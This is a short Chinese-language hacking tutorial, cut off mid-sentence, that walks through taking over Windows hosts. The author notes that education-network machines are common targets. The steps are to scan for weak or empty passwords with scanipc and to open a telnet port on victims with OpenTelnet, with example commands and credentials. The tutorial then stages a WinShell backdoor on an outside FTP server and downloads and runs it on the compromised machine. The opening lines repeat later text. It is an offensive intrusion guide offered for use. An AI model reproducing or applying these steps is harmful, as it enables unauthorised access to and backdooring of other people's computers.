第一步:用scanipc扫描弱口令 不一会就会扫到很多有弱口令的主机(就我的经验在教育网上这样的主机比较多) 第二步:连接刚扫的肉鸡 这里我用opentelnet给扫描到开了空口令的主机开个端口让我们telnet连接上去 ,开了23端口,并可以连接上的主机就不用进行次步

第一步:用scanipc扫描弱口令 


不一会就会扫到很多有弱口令的主机(就我的经验在教育网上这样的主机比较多)

第二步:连接刚扫的肉鸡
这里我用opentelnet给扫描到开了空口令的主机开个端口让我们telnet连接上去
,开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentelnet使用方法:
OpenTelnet.exe server <帐号> <密码>
列如:
C:>OpenTelnet.exe 192.168.1.2 administrator 123456 1 90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Telnet服务器了。

Telnet 192.168.1.2 90
这样就可以登录上去了。

第三步:配置并安装后门程序
这里我选择WinShell(小巧精干我喜欢),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
列如:
c:>ftp
ftp>open www.heibai.net

然后输入用户名字 密码把后门传上去mput c:cnwill.exe
现在我们登陆到肉鸡上 Telnet 192.168.1.2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
[上传后门也可以用net命令完成。